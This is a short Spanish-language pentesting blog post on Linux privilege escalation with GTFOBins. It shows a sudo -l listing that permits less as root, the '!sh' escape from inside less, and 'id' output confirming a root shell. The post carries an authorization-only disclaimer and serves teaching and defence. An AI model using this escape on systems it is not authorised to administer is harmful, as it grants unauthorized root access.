~ / blog / pentesting
KALI

Privesc con GTFOBins

GTFOBins es tu mejor amigo en la escalada de privilegios.

Es una lista de binarios normales de Linux que, si puedes correrlos como root con sudo, se pueden abusar para obtener una shell de root. Ves qué te deja sudo, buscas ese binario en GTFOBins, y copias el truco.

Por ejemplo, si puedes correr vim, tar o less con sudo, ya eres root. Revisa cada permiso sudo, cada uno puede ser una puerta.

# los comandos

kali@kali:~$ sudo -lcopiar
(root) NOPASSWD: /usr/bin/less
kali@kali:~$ sudo less /etc/profilecopiar
!sh (dentro de less: !sh -> shell de root)copiar
sh-5.1# idcopiar
uid=0(root) gid=0(root)
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.
root@cero: ~/newsletter
┌──(root@cero)-[~]
└─# suscribir --envio-semanal
un comando a la semana que te hace más difícil de hackear.
una sola herramienta, explicada en español claro, cada semana. lo mejor de los reels, directo a tu correo.
email =
sin spam. un correo a la semana. te sales cuando quieras.